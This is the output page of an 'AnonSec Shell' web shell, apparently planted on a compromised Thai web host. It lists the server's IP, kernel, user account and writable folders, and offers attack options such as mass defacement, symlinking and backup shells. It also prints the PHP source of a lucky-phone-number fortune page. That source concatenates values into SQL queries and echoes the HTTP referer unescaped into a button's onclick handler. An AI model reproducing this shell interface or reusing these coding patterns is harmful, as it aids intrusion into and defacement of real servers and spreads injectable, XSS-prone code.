AnonSec Shell
Server IP : 104.21.37.246  /  Your IP : 172.71.28.145   [ Reverse IP ]
Web Server : Apache
System : Linux cpanel01wh.bkk1.cloud.z.com 2.6.32-954.3.5.lve1.4.59.el6.x86_64 #1 SMP Thu Dec 6 05:11:00 EST 2018 x86_64
User : cp648411 ( 1354)
PHP Version : 7.2.34
Disable Function : NONE
Domains : 0 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home2/cp648411/public_html/kainumber.com/reading/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /home2/cp648411/public_html/kainumber.com/reading/detail.php
<?php include('../include/header.php')?>
<?php $menu = 'forecast';?>
<?php
if ( !is_numeric($_GET['phonenumber']) )
{
	?><meta http-equiv="refresh" content="0;URL=../home/index.php"><?php
	exit;
}
?>
<?php include('../theme/menu.php')?>
<?php //include('../banner/index.php')?>


<div class="container mt-5 px-lg-5 px-3">
	 <div class="row px-md-5 mb-3 pt-md-5">
		 <div class="col-md-12 px-md-2 d-flex justify-content-between align-baseline" >
				 <div class="">
					 <h2 class="pb-0 mb-0 border-kai-bottom-light fw-loungethbold">ความหมายของเบอร์</h2>
					 <!--<hr class="line1 my-1">-->
				 </div>
		 </div>
	 </div>
</div>
<?php

$phonenumber = $_GET['phonenumber'];
include('perl.php');

if($phonenumber <> '')
{
	/*
	echo "<pre>";
	print_r($pass3_all);
	echo "</pre>";
	print_r(count($pass3_all)).'<br>';
	*/
$Fullscore_p = 100 * count($pass3_all);
$percent_number = (($TotalScore_plus - abs($TotalScore_delete))*100)/$Fullscore_p;
/*
 echo $TotalScore_plus.'<br>';
 echo $TotalScore_delete.'<br>';
 echo $Fullscore_p.'<br>';
 echo abs($TotalScore_delete);
 */

$list_pho = array('table'=>'phonenumber','where'=>'phonenumber = "'.$phonenumber.'"');
$view_pho = $view_db->view($list_pho);
$row_pho = $view_db->q($view_pho);
$dpr = 0;
$dpr = $percent_number*4.4;
//$dpr = $row_pho['sum_number']*4.4;
//$dpr = 50 * 4.4;
$dpr = 440 - $dpr;
$se =  $Phone_class->catshort_number2('',$row_pho['phonenumber']);
$se2 =  $Phone_class->catshort_number3('',$row_pho['phonenumber']);

/*
echo "<pre>";
print_r($se2);
echo "</pre>";
echo "<pre>";
print_r($pass3_all);
echo "</pre>";
*/
//echo $se[0];
$d_t = 0;
$f_t = 0;
$h_t = 0;
$l_t = 0;
$m_t = 0;
$p_t = 0;
$s_t = 0;
$su_t = 0;
$w_t = 0;

for ($i=0; $i < count($pass3_all) ; $i++) {
	if($d_t==0){$d_t = $pass3_all[$i]['description']; }
	else{$d_t=$d_t + $pass3_all[$i]['description']; }

	if($f_t==0){$f_t = $pass3_all[$i]['friendship']; }
	else{$f_t=$f_t + $pass3_all[$i]['friendship']; }

	if($h_t==0){$h_t = $pass3_all[$i]['health']; }
	else{$h_t=$h_t + $pass3_all[$i]['health']; }

	if($l_t==0){$l_t = $pass3_all[$i]['love']; }
	else{$l_t=$l_t + $pass3_all[$i]['love']; }

	if($m_t==0){$m_t = $pass3_all[$i]['money']; }
	else{$m_t=$m_t + $pass3_all[$i]['money']; }

	if($p_t==0){$p_t = $pass3_all[$i]['parent']; }
	else{$p_t=$p_t + $pass3_all[$i]['parent']; }

	if($s_t==0){$s_t = $pass3_all[$i]['safety']; }
	else{$s_t=$s_t + $pass3_all[$i]['safety']; }

	if($su_t==0){$su_t = $pass3_all[$i]['support']; }
	else{$su_t=$su_t + $pass3_all[$i]['support']; }

	if($w_t==0){$w_t = $pass3_all[$i]['w_t']; }
	else{$w_t=$w_t + $pass3_all[$i]['w_t']; }
}
/*
echo $d_t.'<br>';
echo $f_t.'<br>';
echo $h_t.'<br>';
echo $l_t.'<br>';
echo $m_t.'<br>';
echo $p_t.'<br>';
echo $s_t.'<br>';
echo $su_t.'<br>';
echo $w_t.'<br>';
*/

if($row_pho["category_type"]==2){

	$search_1n = 'id="'.$se.'"';

}else{
	$search_1n = 'id = "'.$_SESSION["get_id_cat"].'"';

}

$list_phrc = array('table'=>'category','where'=>$search_1n,'order'=> "ORDER BY id DESC LIMIT 0 , 1");
$view_phrc = $view_db->view($list_phrc);
$row_phrc = $view_db->q($view_phrc);

?>

<?php include('cart.php')?>
<div class="col-md-12 px-md-3 text-center mt-5">
	<h2 class="pb-0 mb-0 fw-loungethbold " style="color: #ffc000;">* เปอร์เซ็นของผลรวมไม่ได้การันตีว่าเบอร์ไม่ดี ส่วนหนึ่งอยู่กับบุคคลที่ใช้ *</h2>
</div>
<style media="screen">
	.progressbar{width: 160px;height: 160px;}
	.progressbar__svg-circle{stroke-width: 10px;}
	.shadow-html {
	  filter: drop-shadow(0 0 5px #ff7800);
	}
	.circle-html1 {
  -webkit-animation: anim_circle-html1 1s ease-in-out forwards;
          animation: anim_circle-html1 1s ease-in-out forwards;
	}
	@-webkit-keyframes anim_circle-html1 {
  	to {
	    	stroke-dashoffset: <?php echo $dpr; ?>;
		  }
		}

		@keyframes anim_circle-html1 {
		  to {
		    stroke-dashoffset: <?php echo $dpr; ?>;
		  }
		}
</style>
<div class="container px-lg-5 px-3">
	 <div class="row px-md-5 mb-3 pt-md-5">
		 <div class="col-md-12 px-md-2" >
				 <div class="row border-kai2 py-4 justify-content-between">
					 <div class="col-12 col-md-3">
						 <div class="container__progressbars text-center lh-sm" >
							 <div class="progressbar">
								 <svg class="progressbar__svg">
									 <circle cx="74" cy="75" r="70" class="progressbar__svg-circle circle-html1 shadow-html"
									 style="stroke-dashoffset: ;"> </circle>
								 </svg>
								 <span class="progressbar__text shadow-html">
									 <!--
									 <img src="../redbag/category/<?php echo $cate_img; ?>" alt="" class="w-100" >
								 -->
									 <h3 class="progressbar_text2 mb-0 pb-0" style="top: 2px"> <?php echo number_format($percent_number,2); ?>%</h3>
								 </span>
							 </div>
							 <h5 class="progressbar_text2 mt-3 mb-0" style="top: 2px"> ผลรวมเป็น</h5>
							 <small class="progressbar_text2 fix-s" style="top: 2px">(คิดเป็นเปอร์เซ็น)</small>
						 </div>
					 </div>
					 <div class="col-12 col-md-8 text-center text-md-start">
						 <div class="row">
						 	<div class="col-md-6 lh-sm">
								<div>น้ำหนักคำพยากรณ์</div>
								<div>( คำนวณเลขมงคล 7 หลัก )</div>

						 	</div>
						 	<div class="col-md-6">
								<div>
									<?php echo substr($phonenumber,0,3); ?>.
									<?php
									foreach ($p2_score as $value)
									{
											$number_2 = $number_2 . $value['combination'].' ';
									}
									echo $number_2;
									?>
								</div>
						 	</div>
						 </div>
						 <div class="row mt-5">
						 	<div class="col-md-6">
								<div>เบอร์จัดอยู่ในระดับ</div>

						 	</div>
						 	<div class="col-md-6">
								<div>
									<?php
									if($percent_number <= 40){ ?>เบอร์นี้จัดอยู่ในเกณฑ์ที่แย่ สมควรเปลี่ยนเบอร์อย่างยิ่ง<?php }
									if($percent_number >= 41 && $percent_number <= 65){ ?>เบอร์นี้ยังมีตัวเลขที่ไม่ดีอยู่การเปลี่ยนเบอร์ขึ้นอยู่กับวิจารณญาณของผู้ใช้เบอร์<?php }
									if($percent_number >= 66 && $percent_number <= 85){ ?>เบอร์นี้อยู่ในเกณฑ์ดี ถ้าเปลี่ยนควรหาเบอร์ที่เหมาะสมกับดวงของท่านให้มากขึ้น<?php }
									if($percent_number >= 86){ ?>เบอร์นี้อยู่ในเกณฑ์ที่ดีมาก ขึ้นอยู่กับดวงแต่ละบุคคลและการใช้งาน<?php }
									?>
								</div>
						 	</div>
						 </div>
						 <div class="row mt-5">
						 	<div class="col-md-6">
								<div>อยู่ในหมวด</div>

						 	</div>
						 	<div class="col-md-6">
								<div>
									<?php
											rsort($pass3_all);

											$list_cat = array('table'=>'meaningnumber','where'=>'number LIKE  "%'.$pass3_all[0]['list'].'%"');
											$view_cat = $view_db->view($list_cat);
											$row_cat = $view_db->q($view_cat);
										//	print_r($view_cat);
									?>

									<?php //echo $row_cat['title']; ?>
									<?php
									 $row_pho['category_type'];
		              if($row_pho['category_type']==2)
		              {
		                //$short_number = $Phone_class->catshort_number2($row_phrc['id'],$phonenumber);
		                $short_number = $Phone_class->catshort_number($se,$phonenumber);
										if( $short_number==''){
											$short_number = $Phone_class->catshort_number('',$phonenumber);

										}
		                $short_number;
		              }
		              else
		              {
		                $short_number= 'เบอร์สวย';
		              }
									echo $short_number;
		              //echo strlen($short_number);
		              ?>

								</div>
						 	</div>
						 </div>


					 </div>

				 </div>
		 </div>
	 </div>
</div>

<div class="container px-lg-5 px-3">
	 <div class="row px-md-5 mb-3 pt-md-5">
		 <div class="col-md-12 px-md-2" >
				 <div class="row border-kai2 py-4">
					 <div class="col-12 col-md-12 text-center text-md-start">
						 <?php
						 foreach( $pass3_all as $value )
						 {
								 $list_de = array('table'=>'meaningnumber','where'=>'number LIKE  "%'.$value['list'].'%"');
								 $view_de = $view_db->view($list_de);
								 $row_de = $view_db->q($view_de);

								 ?><div style="margin-top:20px;"><?php echo $row_de['detail']?></div><?php
						 }

						 if($arr_P4['list'] <> '')
						 {

								 $list_de4 = array('table'=>'meaningnumber','where'=>'number LIKE  "%'.$arr_P4['list'].'%"');
								 $view_de4 = $view_db->view($list_de4);
								 $row_de4 = $view_db->q($view_de4);
								 ?><div style="margin-top:20px;"><?php echo $row_de4['detail']?></div><?php
						 }
						 ?>
					 </div>
				 </div>
		 </div>
	 </div>
</div>
<?php
/*
echo "<pre>";
print_r($_SERVER);
echo "</pre>";
*/
 ?>
<div class="container mt-5 px-lg-5 px-3">
	 <div class="row px-md-5 mb-3">
		 <div class="col-md-12 px-md-2 d-flex justify-content-center align-baseline" >
				 <button type="button" name="button" class="btn btn-kai2 px-md-5" onclick="location.href='<?php echo $_SERVER['HTTP_REFERER']; ?>'">ย้อนกลับ</button>
		 </div>
	 </div>
</div>
<div class="h-fix2"></div>
<div class="container px-md-5">
   <div class="row px-md-5 d-md-flex justify-content-center pt-md-5">
		 <div class="col-12 col-md-auto text-center px-0 mb-3 ">
		 		<a href="https://lin.ee/egzGHWJ" target="_blank" class="text-decoration-none text-light">
		 			<img src="../image/line_n1.webp" alt="" >
					 @kainumber
		 		</a>
			</div>

			<span class="col-md-auto px-2 d-none d-md-block">/</span>
			<div class="col-12 col-md-auto text-center px-0">
		 		<a href="https://th-th.facebook.com/kainumber/" target="_blank" class="text-decoration-none text-light">
		 			<img src="../image/fb_n1.webp" alt="" >
					 อาจารย์ไก่ เบอร์มงคล
		 		</a>
		 </div>
	</div>
  <div class="row px-md-5 d-md-flex justify-content-center">

		 <div class="col-12 col-md-5 text-center mt-3">
			 <img src="../image/text_logotop.webp" alt="" class="img-fluid col-8 col-md-8">
		 </div>

	 </div>

</div>
<?php } ?>


<!-- /.body -->
<?php include('../include/footer.php')?>
<?php include('../include/footer_js.php')?>

Anon7 - 2022
AnonSec Team